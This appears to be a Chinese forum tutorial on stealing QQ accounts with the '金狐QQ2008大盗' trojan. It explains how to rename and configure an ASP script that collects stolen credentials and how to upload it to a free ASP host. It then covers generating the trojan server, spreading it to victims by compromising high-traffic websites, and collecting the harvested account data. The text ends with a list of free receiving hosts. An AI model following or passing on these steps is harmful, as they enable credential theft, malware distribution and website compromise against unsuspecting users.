1.下载盗Q号的木马,现在流行金狐QQ大盗,
金狐QQ2008大盗.rar (右击点另存为或者用迅雷下载)
2.下载文件后里面主要有两个文件,服务端和asp收信文件,先重命名asp收信文件,把它随便改个名,防止收信空间被人找到,这里我们把它改为abc.asp,然后用文本格式打开abc.asp进行编辑,前两行是这样的
<%
strLogFile="qq2008jh.txt"
把qq2008jh.txt随便改个名,我这里把它改成xyz.txt,然后保存退出
3.打开木马进行配置,一般的配置界面都是这样的
<IMG nmousewheel="return imgzoom(this);" nmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" nclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.stuhack.com/bbs/attachment/6_314_0c4d24b293c0d04.jpg" nload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
现在把空间收信点上,不要选邮箱收信,现在邮箱收信不能用了,把刚才的空间收信文件abc.asp上传到你的收信空间里(支持asp的ftp空间),现在的免费asp空间很少且不稳定,我这里以11mf.cn为例,我申请的空间地址是user.11mf.cn,登录ftp空间地址后,把abc.asp上传到个人网页根目录里,这样asp文件的地址就成了
http://user.11mf.cn/abc.asp,把这个地址填到木马配置端空间收信地址里面,然后点发信测试,你再打开
http://user.11mf.cn/xyz.txt(把收信网址里的abc.asp换成xyz.txt就行了,xyz.txt是上面提到过的),如果你配置正确的话,打开的网页中就会显示一个测试的收信号,然后点生成木马,就会生成木马服务端.把这个服务端通过某种途径传播给别人运行(最流行的方法是攻陷大流量网站后台挂马),下回收信就直接打开
http://user.11mf.cn/xyz.txt吧~~
ps:送给大家几个免费asp收信空间
http://5944.net
http://blank168.com
http://11mf.cn
